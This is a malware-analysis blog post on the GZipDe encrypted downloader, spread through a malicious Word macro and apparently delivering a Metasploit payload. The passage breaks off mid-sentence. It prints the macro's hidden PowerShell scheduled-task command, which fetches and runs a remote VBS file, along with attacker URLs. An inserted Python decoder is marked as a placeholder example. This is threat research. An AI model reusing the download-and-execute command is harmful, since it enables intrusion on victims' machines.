Source: AlienVault Lab Blog
Identifier: 740341
Publication date: 2018-06-20 16:44:00 (viewed: 2018-07-11 17:03:30)
Title: GZipDe: An Encrypted Downloader Serving Metasploit
Text:
At the end of May a Middle Eastern news network published an article about the next Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the area. It uses a piece of text taken from the report as a decoy:
This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.
Malicious Document
The file, uploaded to VirusTotal by a user in Afghanistan, is an MS Office Word document (.doc) carrying a malicious macro. When opened, the macro executes a Visual Basic script stored as a hexadecimal stream, which registers a scheduled task that runs a hidden PowerShell command:
'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F
That PowerShell command downloads a VBS file over HTTP from the following URL and executes it:
http://118.193.251[.]137/dropbox/?p=BT67HU78HZ
We are missing the next step of the infection chain as the server is now offline.
Based on the shared path, we believe the following file is related and may be part of the later infection steps: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe.
GZipDe - The Encrypted Downloader
The internal name of this malware is Gzipde, as shown by the PDB path from the build on the attacker's machine:
\Documents\Visual Studio 2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb
We found the original reverse-tcp payload publicly available on GitHub, although the attacker added an additional encryption layer to that version. The payload consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric-key algorithm, likely to evade antivirus detection.
The key is described as an array of bytes, with the values:
After decompression, it passes through a decryptor. The encryption method used is RC4 with a key length of 23 bytes.
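A decoder for the layering the post describes, added here as an example (not code from AlienVault or from the GZipDe sample): Base64, then decompression (assumed to be gzip, as the name suggests), then RC4 with a 23-byte key. The real key bytes are not reproduced on this page, so PLACEHOLDER_KEY and the sample blob are constructed stand-ins; the script builds its own test input with the same layering so it runs offline.

```python
import base64
import gzip

# Constructed placeholder: the page gives the real key only as "an array of
# bytes", so this is NOT the sample's key, just a 23-byte stand-in for testing.
PLACEHOLDER_KEY = bytes(range(0x41, 0x41 + 23))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR; symmetric, so it both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_gzipde(b64_blob: str, key: bytes) -> bytes:
    """Unwrap the layering the post describes: Base64 -> gzip -> RC4."""
    if len(key) != 23:
        raise ValueError("GZipDe uses a 23-byte RC4 key")
    raw = base64.b64decode(b64_blob)
    if raw[:2] != b"\x1f\x8b":  # gzip magic; anything else means a different layer order
        raise ValueError("no gzip header after Base64 decode")
    return rc4(key, gzip.decompress(raw))


def encode_gzipde(payload: bytes, key: bytes) -> str:
    """Same layering applied in reverse; used here only to build a test sample."""
    return base64.b64encode(gzip.compress(rc4(key, payload))).decode()


# Constructed sample input (a dummy payload), not the blob from the real sample.
SAMPLE_PAYLOAD = b"CONSTRUCTED-DUMMY-PAYLOAD " * 8
SAMPLE_BLOB = encode_gzipde(SAMPLE_PAYLOAD, PLACEHOLDER_KEY)

if __name__ == "__main__":
    recovered = decode_gzipde(SAMPLE_BLOB, PLACEHOLDER_KEY)
    print(len(recovered), recovered[:25])
```

The gzip-magic check rejects a blob whose layers come in a different order before any RC4 attempt, which is the first thing to verify when a variant fails to decode.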
The malware allocates a new memory page with execute, read and write privileges. Then it copies the contents of the decrypted payload and launches a